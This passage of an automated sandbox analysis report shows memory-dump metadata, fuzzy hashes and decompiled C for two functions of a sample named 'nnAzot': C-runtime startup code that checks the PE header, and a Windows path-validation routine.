            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: DeleteFileLoadString
            • String ID:
            • API String ID: 1470351836-0
            • Opcode ID: f2d2b4faf1621391206c3f4fe98e82d420472b5ec6648442b4a678fed4759f50
            • Instruction ID: a24689a7e902abf295c65da7e976512dc143ae2c7dc2fc70e2e8ed6127d9c27c
            • Opcode Fuzzy Hash: f2d2b4faf1621391206c3f4fe98e82d420472b5ec6648442b4a678fed4759f50
            • Instruction Fuzzy Hash: 7E1106B5A00218ABCB22EB65DC49AFA776CDF4A300F0141A9FD06C7141E730DF44CA64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E003A480D() {
            				signed int _t10;
            				void* _t15;
            				signed int _t18;
            				intOrPtr _t19;
            				void* _t25;
            
            				_t25 =  *0x3a0000 - 0x5a4d; // 0x5a4d
            				if(_t25 == 0) {
            					_t19 =  *0x3a003c; // 0xe0
            					__eflags =  *((intOrPtr*)(_t19 + 0x3a0000)) - 0x4550;
            					if( *((intOrPtr*)(_t19 + 0x3a0000)) != 0x4550) {
            						goto L1;
            					} else {
            						_t2 = _t19 + 0x3a0018; // 0xb010b
            						_t18 =  *_t2 & 0x0000ffff;
            						__eflags = _t18 - 0x10b;
            						if(_t18 == 0x10b) {
            							_t10 = 0;
            							__eflags =  *((intOrPtr*)(_t19 + 0x3a0074)) - 0xe;
            							if( *((intOrPtr*)(_t19 + 0x3a0074)) > 0xe) {
            								__eflags =  *(_t19 + 0x3a00e8);
            								goto L9;
            							}
            						} else {
            							__eflags = _t18 - 0x20b;
            							if(_t18 != 0x20b) {
            								goto L1;
            							} else {
            								_t10 = 0;
            								__eflags =  *((intOrPtr*)(_t19 + 0x3a0084)) - 0xe;
            								if( *((intOrPtr*)(_t19 + 0x3a0084)) > 0xe) {
            									__eflags =  *(_t19 + 0x3a00f8);
            									L9:
            									_t8 = __eflags != 0;
            									__eflags = _t8;
            									_t10 = _t10 & 0xffffff00 | _t8;
            								}
            							}
            						}
            					}
            				} else {
            					L1:
            					_t10 = 0;
            				}
            				 *0x3a6058 = _t10;
            				__set_app_type(E003A4C48(1));
            				 *0x3a66b4 =  *0x3a66b4 | 0xffffffff;
            				 *0x3a66b8 =  *0x3a66b8 | 0xffffffff;
            				 *(__p__fmode()) =  *0x3a606c;
            				 *(__p__commode()) =  *0x3a6060;
            				_t15 = E003A4C8F();
            				if( *0x3a6000 == 0) {
            					__setusermatherr(E003A4C8F);
            				}
            				E003A4E9F(_t15);
            				return 0;
            			}








            0x003a4812
            0x003a4819
            0x003a481f
            0x003a4825
            0x003a482f
            0x00000000
            0x003a4831
            0x003a4831
            0x003a4831
            0x003a4838
            0x003a483d
            0x003a4859
            0x003a485b
            0x003a4862
            0x003a4864
            0x00000000
            0x003a4864
            0x003a483f
            0x003a483f
            0x003a4844
            0x00000000
            0x003a4846
            0x003a4846
            0x003a4848
            0x003a484f
            0x003a4851
            0x003a486a
            0x003a486a
            0x003a486a
            0x003a486a
            0x003a486a
            0x003a484f
            0x003a4844
            0x003a483d
            0x003a481b
            0x003a481b
            0x003a481b
            0x003a481b
            0x003a486f
            0x003a487a
            0x003a4880
            0x003a4887
            0x003a489c
            0x003a48aa
            0x003a48ac
            0x003a48b8
            0x003a48bf
            0x003a48c5
            0x003a48c6
            0x003a48cd

            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: __p__commode__p__fmode__set_app_type__setusermatherr
            • String ID:
            • API String ID: 1063105408-0
            • Opcode ID: e71c0a4238abaed1a01e7562ef6a1328450fad12cc85da980d382012f65cad90
            • Instruction ID: 9b3443eebfbbd7b3dd1fcd361634492c38f8d67488dec02edfb08e63e9ddda14
            • Opcode Fuzzy Hash: e71c0a4238abaed1a01e7562ef6a1328450fad12cc85da980d382012f65cad90
            • Instruction Fuzzy Hash: 77113030905340CFC76BDB30EC5D22537A8EB83326F25466ED4268A1E1D7BF8986DB10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E003A3D00(signed short* __ecx) {
            				signed short* _v8;
            				signed short _t10;
            				long _t11;
            				void* _t13;
            				signed short _t14;
            				signed short _t16;
            				signed short* _t21;
            				signed int _t33;
            				void* _t38;
            				void* _t43;
            				void* _t44;
            				intOrPtr* _t46;
            
            				_push(__ecx);
            				_t46 = __ecx;
            				if(__ecx == 0) {
            					L21:
            					_t10 = 0;
            					__eflags = 0;
            				} else {
            					_t11 =  *__ecx & 0x0000ffff;
            					if(_t11 == 0) {
            						goto L21;
            					} else {
            						if(iswalpha(_t11) == 0 || E003A46C3(_t46 + 2, L":\\", 3) == 0) {
            							_t13 = 0x5c;
            							__eflags =  *_t46 - _t13;
            							if( *_t46 != _t13) {
            								L7:
            								_t14 = E003A3CA0(_t46,  &_v8);
            								__eflags = _t14;
            								if(_t14 == 0) {
            									__eflags = E003A46C3(_t46, L"\\\\?\\", 4);
            									if(__eflags == 0) {
            										L18:
            										_t16 = E003A476C(_t46, __eflags);
            										__eflags = _t16;
            										if(_t16 == 0) {
            											goto L21;
            										} else {
            											_t43 = 0x5c;
            											__eflags =  *((intOrPtr*)(_t46 + 0x60)) - _t43;
            											if( *((intOrPtr*)(_t46 + 0x60)) != _t43) {
            												goto L21;
            											} else {
            												__eflags =  *(_t46 + 0x62);
            												if( *(_t46 + 0x62) == 0) {
            													goto L4;
            												} else {
            													goto L21;
            												}
            											}
            										}
            									} else {
            										__eflags = iswalpha( *(_t46 + 8) & 0x0000ffff);
            										if(__eflags == 0) {
            											goto L18;
            										} else {
            											__eflags = E003A46C3(_t46 + 0xa, L":\\", 3);
            											if(__eflags != 0) {
            												goto L4;
            											} else {
            												goto L18;
            											}
            										}
            									}
            								} else {
            									_t21 = _v8;
            									_t38 = 0;
            									_t33 =  *_t21 & 0x0000ffff;
            									__eflags = _t33;
            									if(_t33 != 0) {
            										_t44 = 0x5c;
            										do {
            											__eflags = _t33 - _t44;
            											if(_t33 != _t44) {
            												goto L13;
            											} else {
            												_t38 = _t38 + 1;
            												__eflags = _t38 - 1;
            												if(_t38 > 1) {
            													goto L21;
            												} else {
            													__eflags = _t21[1];
            													if(_t21[1] == 0) {
            														goto L21;
            													} else {
            														goto L13;
            													}
            												}
            											}
            											goto L22;
            											L13:
            											_t21 =  &(_t21[1]);
            											_t33 =  *_t21 & 0x0000ffff;
            											__eflags = _t33;
            										} while (_t33 != 0);
            									}
            									goto L4;
            								}
            							} else {
            								__eflags =  *(_t46 + 2);
            								if( *(_t46 + 2) == 0) {
            									goto L4;
            								} else {
            									goto L7;
            								}
            							}
            						} else {
            							L4:
            							_t10 = 1;
            						}
            					}
            				}
            				L22:
            				return _t10;
            			}















            0x003a3d05
            0x003a3d08
            0x003a3d0d
            0x003a3de7
            0x003a3de7
            0x003a3de7
            0x003a3d13
            0x003a3d13
            0x003a3d19
            0x00000000
            0x003a3d1f
            0x003a3d2b
            0x003a3d4a
            0x003a3d4d
            0x003a3d50
            0x003a3d58
            0x003a3d5d
            0x003a3d62
            0x003a3d64
            0x003a3da2
            0x003a3da4
            0x003a3dc9
            0x003a3dcb
            0x003a3dd0
            0x003a3dd2
            0x00000000
            0x003a3dd4
            0x003a3dd6
            0x003a3dd7
            0x003a3ddb
            0x00000000
            0x003a3ddd
            0x003a3ddd
            0x003a3de1
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x003a3de1
            0x003a3ddb
            0x003a3da6
            0x003a3dae
            0x003a3db0
            0x00000000
            0x003a3db2
            0x003a3dc1
            0x003a3dc3
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x003a3dc3
            0x003a3db0
            0x003a3d66
            0x003a3d66
            0x003a3d69
            0x003a3d6b
            0x003a3d6e
            0x003a3d71
            0x003a3d75
            0x003a3d76
            0x003a3d76
            0x003a3d79
            0x00000000
            0x003a3d7b
            0x003a3d7b
            0x003a3d7c
            0x003a3d7f
            0x00000000
            0x003a3d81
            0x003a3d81
            0x003a3d85
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x003a3d85
            0x003a3d7f
            0x00000000
            0x003a3d87
            0x003a3d87
            0x003a3d8a
            0x003a3d8d
            0x003a3d8d
            0x003a3d92
            0x00000000
            0x003a3d71
            0x003a3d52
            0x003a3d52
            0x003a3d56
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x003a3d56
            0x003a3d40
            0x003a3d40
            0x003a3d42
            0x003a3d42
            0x003a3d2b
            0x003a3d19
            0x003a3de9
            0x003a3def

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: iswalpha
            • String ID: \\?\
            • API String ID: 2011389249-4282027825
            • Opcode ID: 91e057be700fc22ab160924158e8761087df022875148b9f1fb7035613160c47
            • Instruction ID: 0c5418603a2fda90779a671fb7f28173ec90a4f319c6631ea7565b51654e1a38
            • Opcode Fuzzy Hash: 91e057be700fc22ab160924158e8761087df022875148b9f1fb7035613160c47
            • Instruction Fuzzy Hash: D121DA25700751D6DA37EB668C11A3BF2A8DF83B90F268429F942CB5D0FB61DF41C2A0
            Uniqueness

            Uniqueness Score: -1.00%